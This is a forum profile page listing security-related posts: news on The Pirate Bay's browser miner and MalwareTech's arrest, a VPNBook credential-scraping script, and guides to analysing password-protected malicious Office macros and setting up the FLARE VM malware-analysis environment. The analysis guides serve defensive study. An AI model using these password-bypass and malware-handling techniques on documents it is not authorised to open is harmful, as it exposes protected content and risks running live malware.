Jump to content

Usr6

Active Members
  • Posts

    1337
  • Joined

  • Last visited

  • Days Won

    89

Everything posted by Usr6

  1. A few hours ago a cryptocurrency miner appeared on The Pirate Bay website, using the computer resources of visitors to mine Monero coins. The operators of The Pirate Bay are testing it as a new way to generate revenue, but many users aren't happy. Four years ago many popular torrent sites added an option to donate via Bitcoin. The Pirate Bay was one of the first to jump on board and still lists its address on the website. While there’s nothing wrong with using Bitcoin as a donation tool, adding a Javascript cryptocurrency miner to a site is of a totally different order. A few hours ago many Pirate Bay users began noticing that their CPU usage increased dramatically when they browsed certain Pirate Bay pages. Upon closer inspection, this spike appears to have been caused by a Bitcoin miner embedded on the site. The code in question is tucked away in the site’s footer and uses a miner provided by Coinhive. This service offers site owners the option to convert the CPU power of users into Monero coins. The miner does indeed appear to increase CPU usage quite a bit. It is throttled at different rates (we’ve seen both 0.6 and 0.8) but the increase in resources is immediately noticeable. The miner is not enabled site-wide. When we checked, it appeared in the search results and category listings, but not on the homepage or individual torrent pages. There has been no official comment from the site operators on the issue (update, see below), but many users have complained about it. In the official site forums, TPB supermoderator Sid is clearly not in agreement with the site’s latest addition. “That really is serious, so hopefully we can get some action on it quickly. And perhaps get some attention for the uploading and commenting bugs while they’re at it,” Sid writes. Like many others, he also points out that blocking or disabling Javascript can stop the automatic mining. This can be done via browser settings or through script blocker addons such as NoScript and ScriptBlock. Alternatively, people can block the miner URL with an ad-blocker. Whether the miner is a new and permanent tool, or perhaps triggered by an advertiser, is unknown at the point. When we hear more this article will be updated accordingly. Update: We were told that the miner is being tested for a short period (~24 hours) as a new way to generate revenue. This could eventually replace the ads on the site. More info may be revealed later. Sursa: https://torrentfreak.com/the-pirate-bay-website-runs-a-cryptocurrency-miner-170916/
  2. md5 (OldGarage.jpg) = 1427C48D8CAB1CF6CB6C628FDEBCC0D7
  3. https://www.usenix.org/system/files/conference/usenixsecurity15/sec15-paper-caliskan-islam.pdf
  4. Ca orice serviciu gratuit si cel oferit de https://www.vpnbook.com/ are mici "imperfectiuni", in cazul de fata, unul din ele fiind necesitatea de a vizita site-ul in mod regulat pentru obtinerea datelor de login. Prin aceasta automatizare vom elimina acest mic dezavantaj. Se presupune ca este folosit open vpn Modificarea fisierului config (Locatie: C:\Program Files\OpenVPN\config\) - pentru utilizarea datelor de logare dintr-un fisier - in fisierul ".ovpn" vom inlocui linia: auth-user-pass cu : auth-user-pass "D:\\vpn_book.txt" Automatizare: #Python 2.7 import urllib2 import re vpn = "http://www.vpnbook.com/" response = urllib2.urlopen(vpn) data = response.read() u = re.search("Username: (\w+)<", data) if u: utilizator = u.group(1) p = re.search("Password: (\w+)<", data) if p: parola = p.group(1) with open("D:\\vpn_book.txt", "w") as login_file: login_file.write(utilizator +"\n" + parola) login_file.close() La fiecare rulare a scriptului de mai sus datele de login din fisierul d:\\vpn_book.txt for fi improspatate
  5. Who should read this? Technical people who want to get up to speed on machine learning quickly Non-technical people who want a primer on machine learning and are willing to engage with technical concepts Anyone who is curious about how machines think This guide is intended to be accessible to anyone. Basic concepts in probability, statistics, programming, linear algebra, and calculus will be discussed, but it isn’t necessary to have prior knowledge of them to gain value from this series. Part 1: Why Machine Learning Matters. The big picture of artificial intelligence and machine learning — past, present, and future. Part 2.1: Supervised Learning. Learning with an answer key. Introducing linear regression, loss functions, overfitting, and gradient descent. Part 2.2: Supervised Learning II. Two methods of classification: logistic regression and SVMs. Part 2.3: Supervised Learning III. Non-parametric learners: k-nearest neighbors, decision trees, random forests. Introducing cross-validation, hyperparameter tuning, and ensemble models. Part 3: Unsupervised Learning. Clustering: k-means, hierarchical. Dimensionality reduction: principal components analysis (PCA), singular value decomposition (SVD). Part 4: Neural Networks & Deep Learning. Why, where, and how deep learning works. Drawing inspiration from the brain. Convolutional neural networks (CNNs), recurrent neural networks (RNNs). Real-world applications. Part 5: Reinforcement Learning. Exploration and exploitation. Markov decision processes. Q-learning, policy learning, and deep reinforcement learning. The value learning problem. Appendix: The Best Machine Learning Resources. A curated list of resources for creating your machine learning curriculum.
  6. Will this presentation make me an optical engineer? Maybe, but just remember, I omitted almost all the math. The purpose of this tutorial is to touch on a little bit of every topic, from the mundane to the advanced and unusual. But it helps to have a basic understanding of how and why things work, even if you aren’t designing fiber networks. https://www.nanog.org/sites/default/files/2_Steenbergen_Tutorial_New_And_v2.pdf
  7. Reverse Engineering Malware 102 Material Introduction Section 1) Setup Section 2) Information Gathering Section 3) Creating Travel Directions Section 4) Identifying Encryption Section 5) Evasion Techniques Section 6) Identifying Packing Section 7) Extra Fun Section 8) Conclusion Sursa: https://securedorg.github.io/RE102/
  8. June 29, 2017 ~ R3MRUM Over the past year-or-so, there seems to have been an uptick of miscreants password protecting the malicious office documents that they send to their target victims. They do this in an effort to bypass detection and thwart analysis. This blog details a few different tools and methodologies that can be used to analyze such files. Delivery & File Type These malicious documents typically end up making their way to the end point via email. The email message typically consists of some ruse to entice the user to open the document and, conveniently, includes the password needed to decrypt it (Figure 1). Figure 1: Example email with password protected MS Office document attached and password in message body. The ‘m’ at the end of the ‘.dotm’ file extension, shown in Figure 1, tells you that the file attached is macro-enabled. In this instance, it is an MS Office Document Template file but it could have just as easily been a ‘.docm’ file, ‘.xlsm’ file, or any other macro-enabled file type supported by MS Office 2007 or newer. Feel free to read more about these file types on Microsoft’s website. Figure 2 shows the prompt that you are presented with when you open a password protected Office document: Figure 2: Password prompt received when opening a password protected office document. Failed Analysis Method #1: Copy Macros When I first encountered this type of malicious document, my first instinct was to launch the document in an isolated sandbox, enter in the password provided to me in the message body, and then copy the embedded VBA macro code from the document into notepad where I can then perform my analysis. This technically could have worked if the miscreant did not also password protect the Visual Basic Project containing the malicious VBA code with a separate unknown password (Figure 3). Figure 3: Password prompt received when attempting to gain access to macro code. Failed Analysis Method #2: Re-Save Without Password My second thought was: “After I open the document and enter in the initial password, I’ll just re-save the document without a password. Then I’ll be able to use my analysis tools to inspect the file’s contents.” Unfortunately, this doesn’t work either due to the fact that the VB Project within the encrypted document is also password protected. If you attempt this method, the contents of the document (images, text, etc…) will still be present within the unencrypted copy of the document but any embedded macros will be stripped. Successful Analysis Method #1: Decrypt with MSOffice-Crypt & Analyze w/ olevba|ViperMonkey Let me introduce you to a nifty little tool called msoffice-crypt. This bad mama jama enables you to dump a decrypted version of the encrypted office document out to a file. As a bonus, it works in both Windows and Linux! Figure 4: msoffice-crypt options & decrypting of encrypted Office document In Figure 4, I ran msoffice-crypt.exe without any arguments so that you can see the different supported options. Then, in the highlighted section, I ran the following command, which decrypted smith.dotm using the password “6429”: msoffice-crypt.exe -d -p 6429 smith.dotm If you did not provide an output file name, msoffice-crypt will default to appending an “_d” to the file name, like so: smith_d.dotm. Figure 5: Decrypted document created within the current working directory Sure enough, we see in Figure 5 that the decrypted Office document has been created. Now, if we launch this newly created document (in an isolated environment, of course!), you should no longer received the password prompt. Figure 6: Office document decrypted. Password no longer needed to open. Voilà! No password prompt received! (Figure 6) If you didn’t know, MS Office 2007+ documents are OpenXML format which means they are actually just compressed archives that you can decompress using you’re favorite archive extractor (WinZip, 7z, etc..). We can also spot the difference between the encrypted and decrypted documents by comparing the decompressed contents of both. Figure 7: Contents of decompressed encrypted Office document Figure 7 shows the contents of my encrypted Office document whereas Figure 8 shows the contents of my decrypted Office document. Figure 8: Contents of decompressed decrypted Office document The contents depicted in both Figures 7 and 8 are typical and should match what you are seeing in whatever OpenXML formatted Office document you are analyzing; not just this sample. This actually segues nicely into the next step, which is to extract out the VBA Macro code. If you recall, the malware author also password protected the VB Project containing the macro code. While I am not aware of any tool that will strip this protection from the document, it doesn’t matter as existing tools such as oletools, ViperMonkey, etc.. completely bypass it. Back in the day (like 3 months ago), I would have extracted out the VBA code by decompressing the OpenXML archive, locating the OLE binary within the “word” folder (i.e vbaProject.bin), and then using something like OfficeMalScanner (Figures 9 & 10): Figure 9: Running OfficeMalScanner against OLE binary found within OpenXML archive Figure 10: VBA code extracted from OLE binary using OfficeMalScanner … or olevba from the oletools suite (Figure 11): Figure 11: VBA code extracted from OLE binary using olevba But this is old-school. These days, all the kids are using ViperMonkey. ViperMonkey not only extracts the VBA for you but also emulates execution so that if the VBA is heavily obfuscation (in this case, it is not), you can quickly and safely derive what the code is actually doing. Also, it can handle OpenXML files so there is no need to extract the archive and locate the OLE binary. Figure 12: Analysis of the decrypted Office document using ViperMoney Figure 12 shows how ViperMoney not only extracts and displays the embedded VBA macro but it also gives you the execution flow of the malicious code in a quick and easy-to-ingest format. This dramatically reduces analysis time which, in turn, expedites time-to-respond. If I ever meet Philippe Lagadec (@decalage2), I’m going to buy that man a beer! Successful Analysis Method #2: Simply Open w/ LibreOffice Your probably going to hate me for making you step through the entire blog before mentioning – what turns out to be – the most simplest (and laziest) solution for accessing the embedded VBA code within a password protected document/project. Since REMNux doesn’t come packaged with LibreOffice, you’ll need to install it by simply running: sudo apt-get install libreoffice Once installed, open the encrypted Office document in LibreOffice by running: libreoffice smith.dotm Like when you opened the encrypted Office document within MS Office (Figure 2), you will be requested to enter in the document’s password (Figure 13). Figure 13: LibreOffice password prompt When you enter in the password, the document will successfully load. Now, you will be able to access the embedded VBA macro code by navigating to: Tools –> Macros –> Organize Macros –> LibreOffice Basic You will be presented with a pop-up window (Figure 14) where you will need to find the project containing the VBA code and hit the Edit button. Figure 14: LibreOffice’s Macro Editor Dialogue And BOOM! LibreOffice’s Basic Editor opens; giving you direct access to the VBA macro code without needing to also know the VB Project’s password (Figure 15): Figure 15: LibreOffice’s Basic Editor providing access to embedded VBA code. Bypassing password. That’s it! It’s that simple! My personal preference is the first method as I’m a command-line junkie. But, if you are more comfortable with performing your analysis via a GUI, then the LibreOffice method might be a better fit for you! Regardless, knowing multiple methods for solving single problem will only make you a better analyst. References Open XML Formats and file name extensions How to remove a password from a document MSOffice-Crypt: A tool/lib to encrypt/decrypt Microsoft Office Document Wikipedia: Office Open XML OfficeMalScanner Decalage2: oletools GitHub Decalage2: ViperMonkey GitHub LibreOffice Wiki Sursa: https://r3mrum.wordpress.com/2017/06/29/analyzing-malicious-password-protected-office-documents/
  9. As a reverse engineer on the FLARE Team I rely on a customized Virtual Machine (VM) to perform malware analysis. The Virtual Machine is a Windows installation with numerous tweaks and tools to aid my analysis. Unfortunately trying to maintain a custom VM like this is very laborious: tools frequently get out of date and it is hard to change or add new things. There is also a constant fear that if the VM gets corrupted it would be super tedious to replicate all of the settings and tools that I’ve built up over the years. To address this and many related challenges, I have developed a standardized (but easily customizable) Windows-based security distribution called FLARE VM. FLARE VM is a freely available and open sourced Windows-based security distribution designed for reverse engineers, malware analysts, incident responders, forensicators, and penetration testers. Inspired by open-source Linux-based security distributions like Kali Linux, REMnux and others, FLARE VM delivers a fully configured platform with a comprehensive collection of Windows security tools such as debuggers, disassemblers, decompilers, static and dynamic analysis utilities, network analysis and manipulation, web assessment, exploitation, vulnerability assessment applications, and many others. The distribution also includes the FLARE team’s public malware analysis tools such as FLOSS and FakeNet-NG. How To Get It You are expected to have an existing installation of Windows 7 or above. This allows you to choose the exact Windows version, patch level, architecture and virtualization environment yourself. Once you have that available, you can quickly deploy the FLARE VM environment by visiting the following URL in Internet Explorer (other browsers are not going to work): http://boxstarter.org/package/url?https://raw.githubusercontent.com/fireeye/flare-vm/master/flarevm_malware.ps1 After you navigate to the above URL in the Internet Explorer, you will be presented with a Boxstarter WebLauncher dialog. Select Run to continue the installation as illustrated in Figure 1. Following successful installation of Boxstarter WebLauncher, you will be presented with a console window and one more prompt to enter your Windows password as shown in Figure 2. Your Windows password is necessary to restart the machine several times during the installation without prompting you to login every time. Figure 2: Boxstarter Password Prompt The rest of the process is fully automated, so prepare yourself a cup of coffee or tea. Depending on your connection speed, the initial installation takes about 30-40 minutes. Your machine will also reboot several times due to the numerous software installation’s requirements. During the deployment process, you will see installation logs of a number of packages. Once the installation is complete, it is highly recommended to switch the Virtual Machine networking settings to Host-Only mode so that malware samples would not accidentally connect to the Internet or local network. Also, take a fresh virtual machine snapshot so this clean state is saved! The final FLARE VM installation should look like Figure 3. NOTE: If you encounter a large number of error messages, try to simply restart the installation. All of the existing packages will be preserved and new packages will be installed. Getting Started The VM configuration and the included tools were either developed or carefully selected by the members of the FLARE team who have been reverse engineering malware, analyzing exploits and vulnerabilities, and teaching malware analysis classes for over a decade. All of the tools are organized in the directory structure shown in Figure 4. Figure 4: FLARE VM Tools While we attempt to make the tools available as a shortcut in the FLARE folder, there are several available from command-line only. Please see the online documentation at http://flarevm.info for the most up to date list. Sample Analysis In order to best illustrate how FLARE VM can assist in malware analysis tasks let’s perform a basic analysis on one of the samples we use in our Malware Analysis Crash Course. First, let’s obtain some basic indicators by looking at the strings in the binary. For this exercise, we are going to run FLARE’s own FLOSS tool, which is a strings utility on steroids. Visit http://flosseveryday.info for additional information about the tool. You can launch it by clicking on the FLOSS icon in the taskbar and running it against the sample as illustrated in Figure 5. Unfortunately, looking over the resulting strings in Figure 6 only one string really stands out and it is not clear how it is used. Figure 6: Strings Analysis Let’s dig a bit more into the binary by opening up CFF Explorer in order to analyze sample’s imports, resources, and PE header structure. CFF Explorer and a number of other utilities are available in the FLARE folder that can be accessed from the Desktop or the Start menu as illustrated in Figure 7. Figure 7: Opening Utilities While analyzing the PE header, there were several indicators that the binary contains a resource object with an additional payload. For example, the Import Address Table contained relevant Windows API calls such as LoadResource, FindResource and finally WinExec. Unfortunately, as you can see in Figure 8 the embedded payload “BIN” contains junk so it is likely encrypted. Figure 8: PE Resource At this point, we could continue the static analysis or we could “cheat” a bit by switching over to basic dynamic analysis techniques. Let’s attempt to quickly gather basic indicators by using another FLARE tool called FakeNet-NG. FakeNet-NG is a dynamic network emulation tool which tricks malware into revealing its network functionality by presenting it with fake services such as DNS, HTTP, FTP, IRC and many others. Please visit http://fakenet.info for additional information about the tool. Also, let’s launch Procmon from Sysinternals Suite in order to monitor all of the File, Registry and Windows API activity as well. You can find both of these frequently used tools in the taskbar illustrated in Figure 9. Figure 9: Dynamic Analysis After executing the sample with Administrator privileges, we quickly find excellent network- and host–based indicators. Figure 10 shows FakeNet-NG responding to malware’s attempt to communicate with evil.mandiant.com using HTTP protocol. Here we capture useful indicators such as a complete HTTP header, URL and a potentially unique User-Agent string. Also, notice that FakeNet-NG is capable of identifying the exact process communicating which is level1_payload.exe. This process name corresponds to the unique string that we have identified in the static analysis, but couldn’t understand how it was used. Figure 10: FakeNet-NG Comparing our findings with the output of Procmon in Figure 11, we can confirm that the malware is indeed responsible for creating level1_payload.exe executable in the system32 folder. Figure 11: Procmon As part of the malware analysis process, we could continue digging deeper by loading the sample in a disassembler and performing further analysis inside a debugger. However, I would not want to spoil this fun for our Malware Analysis Crash Course students by sharing all the answers here. That said all of the relevant tools to perform such analysis are already included in the distribution such as IDA Pro and Binary Ninja disassemblers, a nice collection of debuggers and several plugins, and many others to make your reverse engineering tasks as convenient as possible. Have It Your Way FLARE VM is a constantly growing and changing project. While we try to cover as many use-case scenarios as possible it is simply impossible due to the nature of the project. Luckily, FLARE VM is extremely easy to customize because it was built on top of the Chocolatey project. Chocolatey is a Windows-based package management system with thousands of packages. You can find the list here https://chocolatey.org/packages In addition to the public Chocolatey repository, FLARE VM uses our own FLARE repository which constantly growing and currently contains about 40 packages. What all this means is that if you want to quickly add some package, let’s say Firefox, you no longer have to navigate to the software developer’s website. Simply open up a console and type in the command in Figure 12 to automatically download and install any package: Figure 12: Installing packages In a few short moments, Firefox icon is going to appear on your Desktop with no user interaction necessary. Staying up to date As I’ve mentioned in the beginning, one of the hardest challenges of unmanaged Virtual Machine is trying to keep all the tools up to date. FLARE VM solves this problem. You can completely update the entire system by simply running the command in Figure 13. Figure 13: Staying up to date If any of the installed packages have newer versions, they will be automatically downloaded and installed. NOTE: Don’t forget to take another clean snapshot of an updated system and set networking back to Host-Only. Conclusion I hope you enjoy this new free tool and will adopt it as another trusted resource to perform reverse engineering and malware analysis tasks. Next time you need to set up a new malware analysis environment, try out FLARE VM! In these few pages, we could only scratch the surface of everything that FLARE VM is capable of; however, feel free to leave your comments, tool requests, and bugs on our Github issues page here: https://github.com/fireeye/flare-vm or http://flarevm.info/ Installed Tools Debuggers OllyDbg + OllyDump + OllyDumpEx OllyDbg2 + OllyDumpEx x64dbg WinDbg Disassemblers ==== IDA Free Binary Ninja Demo Java ==== JD-GUI Visual Basic ==== VBDecompiler Flash ==== FFDec .NET ==== ILSpy DNSpy DotPeek De4dot Office ==== Offvis Hex Editors ==== FileInsight HxD 010 Editor PE ==== PEiD ExplorerSuite (CFF Explorer) PEview DIE Text Editors ==== SublimeText3 Notepad++ Vim Utilities ==== MD5 7zip Putty Wireshark RawCap Wget UPX Sysinternals Suite API Monitor SpyStudio Checksum Unxutils Python, Modules, Tools ==== Python 2.7 Hexdump PEFile Winappdbg FakeNet-NG Vivisect FLOSS FLARE_QDB PyCrypto Cryptography Other ==== VC Redistributable Modules (2008, 2010, 2012, 2013) Surse: https://www.fireeye.com/blog/threat-research/2017/07/flare-vm-the-windows-malware.html https://github.com/fireeye/flare-vm
  10. Usr6

    Udemy

    Learn Programming in Python With the Power of Animation This is a Programming Course in Python. It will teach you coding from scratch with the Power of Animation&programming https://www.udemy.com/learn-programming-in-python-with-the-power-of-animation/?couponCode=PBCUDEMYGROUPS
  11. Authorities arrested the UK security researcher known for stopping the WannaCry ransomware attack in May. On Wednesday, 22-year-old Marcus Hutchins -- also known as MalwareTech -- was arrested in Las Vegas for "his role in creating and distributing the Kronos banking Trojan," according to a spokesperson from the U.S. Department of Justice. The charges relate to alleged conduct occurring between July 2014 and July 2015. According to an indictment provided to CNN Tech, Hutchins created the malware and shared it online. Earlier this year, Hutchins became an internet hero when he helped stop WannaCry, a cyberattack that targeted over 150 countries. The ransomware locked down computers and demanded $300 to get files back. Hutchins, who is a malware researcher at the Kryptos Logic security firm, created a killswitch that prevented the spread of the virus. Friends and family have not been able to speak with Hutchins, according to a person close to the situation. The news of the detention was first reported by Motherboard. This story is developing. sursa: http://money.cnn.com/2017/08/03/technology/culture/malwaretech-arrested-las-vegas-trojan/index.html acuzarea: https://www.documentcloud.org/documents/3912524-Kronos-Indictment-R.html pe acelasi subiect: https://motherboard.vice.com/en_us/article/ywp8k5/researcher-who-stopped-wannacry-ransomware-detained-in-us-after-def-con https://www.theguardian.com/technology/2017/aug/03/researcher-who-stopped-wannacry-ransomware-detained-in-us?CMP=share_btn_tw
  12. Kali Linux is comprised of many powerful tools but you cannot put them to good use if you don’t master the underlying operating system. This book covers everything you need to know to be able to effectively use and deploy Kali Linux. This book will discuss basic Linux usage for beginners, Debian package management and usage, Kali installation, configuration, security, and advanced Kali usage including how Kali fits within the enterprise and Kali’s role in various phases of a security assessment. It will serve as an introduction to Kali for beginners but also to cater to users pursuing Kali certification and advanced users seeking more in-depth use cases and inspiration. https://kali.training/downloads/Kali_Revealed_1st_edition.pdf
  13. A bill that bans the use of proxies, Tor, and VPNs passed the Russian government's two legislative bodies and has now reached the desk of President Vladimir Putin, who can now sign it into law just by a stroke of his quill. The Russian Parliament (Duma) approved the proposed bill last week, while yesterday, the bill moved through the Russian Federation Council. The bill passed despite street protests in Moscow over the weekend. Thousands showed up to protest the bill and support a free Internet. The turnout varies from source to source, ranging from 800 to 10,000 protesters. ISPs have to implement the ban The bill is a reaction to Russian Internet users that started using these services to avoid state-sanctioned bans. Under the new bill, Russian Internet service providers have to implement blocks that prevent users from using proxies, Tor, or VPNs to avoid state-sanctioned bans. Russia, through its Roskomnadzor Internet watchdog, regularly bans access to certain websites it deems too explicit or promoting terrorist or extremist content. While some users employ proxies, Tor, or VPNs to access news outlets supporting Russian opposition, most Russians use it to access torrent portals and pornographic websites, some of which are blocked in the country. The bill was put together and forwarded by Roskomnadzor at the request of Russia's Security Council. Russia to become first country to officially block Tor, VPNs If signed into law, Russia will become the first country where officials ban proxies, Tor, and VPNs. Despite popular opinion, China does not block these tools. Instead, China requires VPN providers to register with state authorities. VPN providers approved to function in the country must enforce the same bans that Chinese authorities enforce via the government's Great Firewall. Countries like Turkey have also banned these Tor and VPNs, but it was only a temporary measure, or the government targeted only some VPN providers, not all. Sursa: https://www.bleepingcomputer.com/news/government/russia-passes-bill-banning-proxies-tor-and-vpns/
  14. The HyperV Architecture and its Memory Manager by Andrea Allievi SGX Enclave programming: common mistakes by Michael Atlas Digging Into the Core of Boot by Yuriy Bulygin, Oleksandr Bazhaniuk BASS Automated Signature Synthesizer Mariano Graziano, Jonas Zaddach BinCAT: purrfecting binary static analysis Philippe Biondi, Xavier Mehrenberger, Raphaël Rigo, Sarah Zennou Bochspwn Reloaded: Detecting Kernel Memory Disclosure with x86 Emulation and Taint Tracking - Mateusz “j00ru” Jurczyk Bubble Struggle - Call Graph Visualization with Radare2 - Marion Marschalek You can run, but you can’t hide - Vlad Sabaka Crypton - Exposing malware’s deepest secrets - Julia karpin, Anna Dorfman Reverse Engineering DSSS - Michael Ossmann Exporting IDA Debug Information - Adam Schwalm FreeCalypso: a fully liberated GSM baseband - Mychaela Falconia POSTSCRIPT - FreeCalypso: a fully liberated GSM baseband - Mychaela Falconia Hacking Cell Phone Embedded Systems -Keegan Ryan The Life-Changing Magic of IDAPython: Embedded Device Edition - Maddie Stone MazeWalker - Enriching static malware analysis - Yevgeniy Kulakov Miasm: reverse engineering framework - Fabrice Desclaux, Camille Mougey ZapZap! bangBang! - Ang Cui, Rick Housley Sursa: https://recon.cx/2017/montreal/slides/
  15. Category Title Format Azure Introducing Windows Azure™ for IT Professionals PDF MOBI EPUB Azure Microsoft Azure Essentials Azure Automation PDF MOBI EPUB Azure Microsoft Azure Essentials Azure Machine Learning PDF MOBI EPUB Azure Microsoft Azure Essentials Fundamentals of Azure PDF MOBI EPUB Azure Microsoft Azure Essentials Fundamentals of Azure, Second Edition PDF Azure Microsoft Azure Essentials Fundamentals of Azure, Second Edition Mobile PDF Azure Microsoft Azure Essentials Migrating SQL Server Databases to Azure – Mobile PDF Azure Microsoft Azure Essentials Migrating SQL Server Databases to Azure 8.5X11 PDF Azure Microsoft Azure ExpressRoute Guide PDF Azure Overview of Azure Active Directory DOC Azure Rapid Deployment Guide For Azure Rights Management PDF Azure Rethinking Enterprise Storage: A Hybrid Cloud Model PDF MOBI EPUB BizTalk BizTalk Server 2016 Licensing Datasheet PDF BizTalk BizTalk Server 2016 Management Pack Guide DOC Cloud Enterprise Cloud Strategy PDF MOBI EPUB Cloud Enterprise Cloud Strategy – Mobile PDF Developer .NET Microservices: Architecture for Containerized .NET Applications PDF Developer .NET Technology Guidance for Business Applications PDF Developer Building Cloud Apps with Microsoft Azure™: Best practices for DevOps, data storage, high availability, and more PDF MOBI EPUB Developer Containerized Docker Application Lifecycle with Microsoft Platform and Tools PDF Developer Creating Mobile Apps with Xamarin.Forms, Preview Edition 2 PDF MOBI EPUB Developer Creating Mobile Apps with Xamarin.Forms: Cross-platform C# programming for iOS, Android, and Windows PDF MOBI EPUB Developer Managing Agile Open-Source Software Projects with Microsoft Visual Studio Online PDF MOBI EPUB Developer Microsoft Azure Essentials Azure Web Apps for Developers PDF MOBI EPUB Developer Microsoft Platform and Tools for Mobile App Development PDF Developer Microsoft Platform and Tools for Mobile App Development – Mobile PDF Developer Moving to Microsoft® Visual Studio® 2010 XPS PDF MOBI EPUB Developer Programming Windows 8 Apps with HTML, CSS, and JavaScript PDF MOBI EPUB Developer Programming Windows Store Apps with HTML, CSS, and JavaScript, Second Edition PDF MOBI EPUB Developer Programming Windows® Phone 7 (Special Excerpt 2) XPS PDF Developer Team Foundation Server to Visual Studio Team Services Migration Guide PDF Dynamics 5 cool things you can do with CRM for tablets PDF Dynamics Create Custom Analytics in Dynamics 365 with Power BI PDF Dynamics Create of Customize System Dashboards PDF Dynamics Create Your First CRM Marketing Campaign PDF Dynamics CRM Basics for Outlook basics PDF Dynamics CRM Basics for Sales Pros and Service Reps PDF Dynamics Give Great Customer Service with CRM PDF Dynamics Go Mobile with CRM for Phones – Express PDF Dynamics Go Mobile with CRM for Tablets PDF Dynamics Import Contacts into CRM PDF Dynamics Introducing Microsoft Social Engagement PDF Dynamics Introduction to Business Processes PDF Dynamics Meet Your Service Goals with SLAs and Entitlements PDF Dynamics Microsoft Dynamics CRM 2016 Interactive Service Hub User Guide PDF Dynamics Microsoft Dynamics CRM 2016 On-Premises Volume Licensing and Pricing Guide PDF Dynamics Microsoft Dynamics CRM for Outlook Installing Guide for use with Microsoft Dynamics CRM Online PDF Dynamics Microsoft Dynamics CRM Resource Guide 2015 PDF Dynamics Microsoft Social Engagement for CRM PDF Dynamics Product Overview and Capability Guide Microsoft Dynamics NAV 2016 PDF Dynamics RAP as a Service for Dynamics CRM PDF Dynamics Set Up A Social Engagement Search For Your Product PDF Dynamics Social is for Closers PDF Dynamics Start Working in CRM PDF Dynamics Your Brand Sux PDF General 10 essential tips and tools for mobile working PDF General An employee’s guide to healthy computing PDF General Guide for People who have Language or Communication Disabilities DOC General Guide for People who have Learning Disabilities DOC Licensing Introduction to Per Core Licensing and Basic Definitions PDF Licensing Licensing Windows and Microsoft Office for use on the Macintosh PDF Licensing VLSC Software Assurance Guide PDF Licensing Windows Server 2016 and System Center 2016 Pricing and Licensing FAQs PDF Office Access 2013 Keyboard Shortcuts PDF Office Azure AD/Office 365 seamless sign-in PDF Office Content Encryption in Microsoft Office 365 PDF Office Controlling Access to Office 365 and Protecting Content on Devices PDF Office Customize Word 2013 Keyboard Shortcuts PDF Office Data Resiliency in Microsoft Office 365 PDF Office Excel 2013 Keyboard Shortcuts PDF Office Excel 2016 keyboard shortcuts and function keys DOC Office Excel Online Keyboard Shortcuts PDF Office File Protection Solutions in Office 365 PDF Office First Look: Microsoft® Office 2010 XPS PDF Office Get Started With Microsoft OneDrive PDF Office Get Started With Microsoft Project Online PDF Office Getting started with MyAnalytics DOC Office How To Recover That Un-Saved Office Document PDF Office InfoPath 2013 Keyboard Shortcuts PDF Office Keyboard shortcuts for Microsoft Outlook 2013 and 2016 DOC Office Keyboard shortcuts for Microsoft Word 2016 for Windows DOC Office Licensing Microsoft Office 365 ProPlus Subscription Service in Volume Licensing PDF Office Licensing Microsoft Office software in Volume Licensing PDF Office Microsoft Access 2013 Quick Start Guide PDF Office Microsoft Classroom Deployment PDF Office Microsoft Excel 2013 Quick Start Guide PDF Office Microsoft Excel 2016 for Mac Quick Start Guide PDF Office Microsoft Excel 2016 Quick Start Guide PDF Office Microsoft Excel Mobile Quick Start Guide PDF Office Microsoft Excel VLOOKUP Troubleshooting Tips PDF Office Microsoft OneNote 2013 Quick Start Guide PDF Office Microsoft OneNote 2016 for Mac Quick Start Guide PDF Office Microsoft OneNote 2016 Quick Start Guide PDF Office Microsoft OneNote 2016 Tips and Tricks PDF Office Microsoft OneNote Mobile Quick Start Guide PDF Office Microsoft Outlook 2013 Quick Start Guide PDF Office Microsoft Outlook 2016 for Mac Quick Start Guide PDF Office Microsoft Outlook 2016 Quick Start Guide PDF Office Microsoft Outlook 2016 Tips and Tricks PDF Office Microsoft Powerpoint 2013 Quick Start Guide PDF Office Microsoft PowerPoint 2016 for Mac Quick Start Guide PDF Office Microsoft PowerPoint 2016 for Mac Quick Start Guide PDF Office Microsoft PowerPoint Mobile Quick Start Guide PDF Office Microsoft Project 2013 Quick Start Guide PDF Office Microsoft Publisher 2013 Quick Start Guide PDF Office Microsoft Visio 2013 Quick Start Guide PDF Office Microsoft Word 2013 Quick Start Guide PDF Office Microsoft Word 2016 for Mac Quick Start Guide PDF Office Microsoft Word 2016 Quick Start Guide PDF Office Microsoft Word Mobile Quick Start Guide PDF Office Microsoft® Office 365: Connect and Collaborate Virtually Anywhere, Anytime PDF Office Monitoring and protecting sensitive data in Office 365 DOC Office Office 365 Dedicated Platform vNext Service Release PDF Office Office 365 Licensing Brief PDF Office OneNote 2013 Keyboard Shortcuts PDF Office OneNote Online Keyboard Shortcuts PDF Office Outlook 2013 Keyboard Shortcuts PDF Office Outlook Web App Keyboard Shortcuts PDF Office Own Your Future: Update Your Skills with Resources and Career Ideas from Microsoft® XPS PDF MOBI EPUB Office PowerPoint Online Keyboard Shortcuts PDF Office Project 2013 Keyboard Shortcuts PDF Office Publisher 2013 Keyboard Shortcuts PDF Office Security and Privacy For Microsoft Office 2010 Users PDF MOBI EPUB Office Security Incident Management in Microsoft Office 365 PDF PDF Office SharePoint Online Dedicated & OneDrive for Business Dedicated vNext Service Release PDF Office Skype for Business User Tips & Tricks for Anyone PDF Office Switching from Google Apps to Office 365 for business PDF Office Tenant Isolation in Microsoft Office 365 PDF Office Visio 2013 Keyboard Shortcuts PDF Office Windows 10 Tips and Tricks PDF Office Word 2013 Keyboard Shortcuts PDF Office Word Online Keyboard Shortcuts PDF Office Working with SmartArt Graphics Keyboard Shortcuts PDF Power BI Ask, find, and act—harnessing the power of Cortana and Power BI DOC Power BI Bidirectional cross-filtering in SQL Server Analysis Services 2016 and Power BI Desktop DOC Power BI Configuring Power BI mobile apps with Microsoft Intune DOC Power BI Getting started with the Power BI for Android app DOC Power BI Getting Started with the Power BI for iOS app DOC Power BI How to plan capacity for embedded analytics with Power BI Premium PDF Power BI Introducing Microsoft Power BI PDF Power BI Introducing Microsoft Power BI – Mobile PDF Power BI Microsoft Power BI Premium Whitepaper PDF Power BI Power BI mobile apps—enabling data analytics on the go DOC Power BI Propelling digital transformation in manufacturing operations with Power BI DOC Power BI Using Power BI to visualize data insights from Microsoft Dynamics CRM Online DOC PowerShell Microsoft Dynamics GP 2015 R2 PowerShell Users Guide PDF PowerShell PowerShell Integrated Scripting Environment 3.0 PDF PowerShell Simplify Group Policy administration with Windows PowerShell PDF PowerShell Windows PowerShell 3.0 Examples PDF PowerShell Windows PowerShell 3.0 Language Quick Reference 